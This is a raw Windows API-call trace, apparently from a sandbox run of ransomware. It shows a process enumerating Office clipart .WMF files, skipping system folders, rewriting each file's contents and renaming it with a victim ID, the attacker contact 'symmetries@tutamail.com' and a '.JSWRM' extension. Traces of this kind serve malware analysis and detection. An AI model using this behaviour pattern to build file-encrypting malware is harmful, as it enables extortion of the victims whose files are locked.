RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281243.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281243.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281243.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0088.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281243.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281243.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281243.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0088.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281243.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.688] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46516) returned 1 [0088.688] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb5b0) returned 0x24d210 [0088.689] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb5b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb5b0, lpOverlapped=0x0) returned 1 [0088.693] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.693] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb5b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb5b0, lpOverlapped=0x0) returned 1 [0088.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.694] CloseHandle (hObject=0x314) returned 1 [0088.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0088.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0088.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0088.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0088.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.695] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281243.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281243.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281243.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.695] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31dc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0281630.WMF", cAlternateFileName="")) returned 1 [0088.695] lstrcmpiW (lpString1="J0281630.WMF", lpString2=".") returned 1 [0088.695] lstrcmpiW (lpString1="J0281630.WMF", lpString2="..") returned 1 [0088.695] lstrcmpiW (lpString1="J0281630.WMF", lpString2="...") returned 1 [0088.695] lstrcmpiW (lpString1="J0281630.WMF", lpString2="windows") returned -1 [0088.695] lstrcmpiW (lpString1="J0281630.WMF", lpString2="recovery") returned -1 [0088.695] lstrcmpiW (lpString1="J0281630.WMF", lpString2="perflogs") returned -1 [0088.696] lstrcmpiW (lpString1="J0281630.WMF", lpString2="documents and settings") returned 1 [0088.696] lstrcmpiW (lpString1="J0281630.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.696] lstrcmpiW (lpString1="J0281630.WMF", lpString2="system volume information") returned -1 [0088.696] lstrcmpiW (lpString1="J0281630.WMF", lpString2="msocache") returned -1 [0088.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281630.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281630.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281630.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281630.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281630.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281630.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0088.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281630.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.696] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12764) returned 1 [0088.696] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x31d0) returned 0x24d210 [0088.697] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x31d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x31d0, lpOverlapped=0x0) returned 1 [0088.700] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.700] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x31d0, lpOverlapped=0x0) returned 1 [0088.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.700] CloseHandle (hObject=0x314) returned 1 [0088.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0088.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0088.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0088.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0088.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.701] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281630.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281630.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281630.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.701] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3854, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0281632.WMF", cAlternateFileName="")) returned 1 [0088.701] lstrcmpiW (lpString1="J0281632.WMF", lpString2=".") returned 1 [0088.701] lstrcmpiW (lpString1="J0281632.WMF", lpString2="..") returned 1 [0088.701] lstrcmpiW (lpString1="J0281632.WMF", lpString2="...") returned 1 [0088.701] lstrcmpiW (lpString1="J0281632.WMF", lpString2="windows") returned -1 [0088.701] lstrcmpiW (lpString1="J0281632.WMF", lpString2="recovery") returned -1 [0088.701] lstrcmpiW (lpString1="J0281632.WMF", lpString2="perflogs") returned -1 [0088.701] lstrcmpiW (lpString1="J0281632.WMF", lpString2="documents and settings") returned 1 [0088.701] lstrcmpiW (lpString1="J0281632.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.702] lstrcmpiW (lpString1="J0281632.WMF", lpString2="system volume information") returned -1 [0088.702] lstrcmpiW (lpString1="J0281632.WMF", lpString2="msocache") returned -1 [0088.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0088.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281632.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281632.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281632.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0088.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281632.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281632.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281632.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0088.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281632.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.702] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14420) returned 1 [0088.702] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3850) returned 0x24d210 [0088.702] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3850, lpOverlapped=0x0) returned 1 [0088.705] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.705] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3850, lpOverlapped=0x0) returned 1 [0088.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.705] CloseHandle (hObject=0x314) returned 1 [0088.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0088.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0088.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0088.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0088.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0088.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0088.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.706] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281632.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281632.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281632.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0088.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0088.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.706] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf34834b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf34834b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e88, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0281638.WMF", cAlternateFileName="")) returned 1 [0088.706] lstrcmpiW (lpString1="J0281638.WMF", lpString2=".") returned 1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="..") returned 1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="...") returned 1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="windows") returned -1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="recovery") returned -1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="perflogs") returned -1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="documents and settings") returned 1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="system volume information") returned -1 [0088.707] lstrcmpiW (lpString1="J0281638.WMF", lpString2="msocache") returned -1 [0088.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0088.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281638.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281638.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281638.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0088.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281638.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281638.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281638.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 